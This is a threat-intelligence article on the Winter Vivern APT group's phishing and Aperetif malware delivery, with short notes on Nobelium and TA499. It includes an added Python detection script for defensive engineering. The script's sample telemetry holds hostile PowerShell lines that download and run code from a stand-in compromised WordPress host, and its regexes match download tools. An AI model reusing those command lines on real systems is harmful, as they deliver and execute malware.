The advanced persistent threat (APT) group known as Winter Vivern has increasingly targeted governmental entities across regions, including India, Lithuania, Slovakia, and the Vatican, with campaigns dating back to 2021. Reports from SentinelOne indicate that among the specific targets are Polish government agencies, the Ukrainian Ministry of Foreign Affairs, and individuals within the Indian government.

One significant aspect of this APT’s operations is its focus on private businesses, especially telecommunications companies involved in supporting Ukraine during the ongoing conflict. Tom Hegel, a senior threat researcher at SentinelOne, highlighted the group’s specific interest in these sectors, noting their strategic approach.

Winter Vivern, also tracked as UAC-0114, gained attention recently following a report from Ukraine's Computer Emergency Response Team (CERT-UA), which outlined a malicious campaign delivering malware called Aperetif to state authorities in Ukraine and Poland. Previous investigations revealed the group's use of weaponized Microsoft Excel documents containing XLM (Excel 4.0) macros, which execute PowerShell implants on victims' machines once the user enables the macro content.

Though the origins of Winter Vivern remain ambiguous, their attack methods suggest alignment with the geopolitical objectives of Belarus and Russia. Their tactics encompass a wide range of approaches, such as phishing websites and malicious documents tailored to specific targets, aimed at distributing customized payloads and gaining unauthorized access to sensitive systems.

In a campaign observed during mid-2022, Winter Vivern established credential phishing sites to target users of the Indian government’s legitimate email service. The attack chain typically involves the usage of batch scripts disguised as antivirus tools to deploy the Aperetif trojan from compromised infrastructure such as hacked WordPress sites.

The Aperetif malware, developed in Visual C++, is engineered to collect victim data, maintain persistent backdoor access, and retrieve additional payloads from its command-and-control (C2) server. Hegel characterizes the group as resource-limited yet highly innovative, exhibiting restraint in their operational scope while showcasing significant sophistication in their targeting of government and high-value private sector entities.
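The two delivery behaviours described above, an Excel XLM macro launching PowerShell and a batch script posing as an antivirus tool that pulls the Aperetif payload from a hacked WordPress site, are the kind of thing a detection engineer would want to catch at the endpoint. The following is an added example, not code from SentinelOne, CERT-UA or the original article: a small rule set run over constructed process-creation records (invented paths, users and the domain compromised-blog.example), with each rule mapped to the MITRE ATT&CK technique it evidences. The name fragments used to spot an antivirus look-alike script are an assumption for illustration, not indicators taken from the reports.

```python
import re
from dataclasses import dataclass


# Constructed process-creation records standing in for EDR/Sysmon telemetry.
# Paths, user names and the domain compromised-blog.example are invented.
@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Hypothetical name fragments a script might carry to pass as an antivirus tool.
AV_LOOKALIKE = re.compile(
    r"anti[-_ ]?virus|av[-_]?(update|scan)|defender|scanner|security", re.I)
# Payload fetched from a path inside a WordPress install, as the text describes.
WORDPRESS_URL = re.compile(
    r"https?://[^\s\"']+/wp-(content|includes|admin)/[^\s\"']*", re.I)
DOWNLOAD_HINT = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|\bcurl\b|"
    r"bitsadmin|Start-BitsTransfer", re.I)

# Each rule name mapped to the MITRE ATT&CK technique it evidences.
ATTACK = {
    "office_spawns_script_host": "T1204.002 User Execution: Malicious File",
    "av_lookalike_batch": "T1036 Masquerading",
    "download_from_wordpress_path": "T1105 Ingress Tool Transfer",
}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(ev):
    """Return the list of rule names an event matches (empty for benign)."""
    parent, child = basename(ev.parent_image), basename(ev.image)
    cmd = ev.command_line
    hits = []
    # Office application spawning a script host: the XLM macro -> PowerShell chain.
    if parent in OFFICE_APPS and child in SCRIPT_HOSTS:
        hits.append("office_spawns_script_host")
    # cmd.exe running a .bat whose name imitates an antivirus product.
    if child == "cmd.exe" and re.search(r"\.bat\b", cmd, re.I) and AV_LOOKALIKE.search(cmd):
        hits.append("av_lookalike_batch")
    # Download primitive pointed at a WordPress content path on some web host.
    if DOWNLOAD_HINT.search(cmd) and WORDPRESS_URL.search(cmd):
        hits.append("download_from_wordpress_path")
    return hits


def scan(events):
    """Map event index -> [(rule, ATT&CK technique)] for suspicious events only."""
    report = {}
    for i, ev in enumerate(events):
        hits = classify(ev)
        if hits:
            report[i] = [(h, ATTACK[h]) for h in hits]
    return report


# Constructed sample telemetry: three malicious-looking events, two benign ones.
SAMPLE_EVENTS = [
    ProcessEvent(
        r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "powershell.exe -NoProfile -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient)"
        ".DownloadString('http://compromised-blog.example/wp-content/uploads/2022/11/update.ps1')\""),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Windows\System32\cmd.exe",
        r'cmd.exe /c "C:\Users\victim\Downloads\AntivirusScanner.bat"'),
    ProcessEvent(
        r"C:\Windows\System32\cmd.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell -nop -w hidden -c Invoke-WebRequest -Uri "
        r"http://compromised-blog.example/wp-content/uploads/2022/11/svchost.exe "
        r"-OutFile C:\Users\victim\AppData\Local\Temp\svchost.exe"),
    ProcessEvent(
        r"C:\Windows\explorer.exe",
        r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        r'"EXCEL.EXE" C:\Users\victim\Documents\budget.xlsx'),
    ProcessEvent(
        r"C:\Windows\System32\svchost.exe",
        r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        r"powershell.exe -ExecutionPolicy Bypass -File C:\ProgramData\Scripts\inventory.ps1"),
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        for rule, technique in hits:
            print(f"event {idx}: {rule} [{technique}]")
```

The batch-name rule is deliberately weak on its own (any file name can be chosen by the attacker), which is why the parent/child and download rules sit beside it; in practice the three would be correlated on the same host within a short window rather than alerted on individually.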

In contrast to Winter Vivern's low profile, another Russian state-backed group, Nobelium (Microsoft's name for the actor more widely tracked as APT29), continues to draw attention for its high-profile operations, including the much-discussed SolarWinds supply chain compromise. Nobelium has been implicated in phishing campaigns directed at European Union diplomatic entities, particularly those assisting Ukrainian refugees and their government. Those campaigns have used phishing emails that lead the recipient to HTML files, with legitimate online services used to host the malicious content.

As highlighted by Microsoft, Nobelium remains highly active, executing simultaneous campaigns aimed at government organizations, NGOs, intergovernmental organizations, and think tanks within the U.S., Europe, and Central Asia. The threats are compounded by aggressive email campaigns from another Russia-aligned group, TA499, known for targeting high-profile individuals who publicly discuss Russian disinformation efforts.

The overlap of these APT activities is a substantial concern for cybersecurity professionals. The tactics involved map directly onto the MITRE ATT&CK framework: initial access via phishing and credential harvesting, persistence through malware installation, and privilege escalation to move through sensitive environments. Business leaders are urged to remain vigilant and informed about evolving cyber threats that could impact their operations.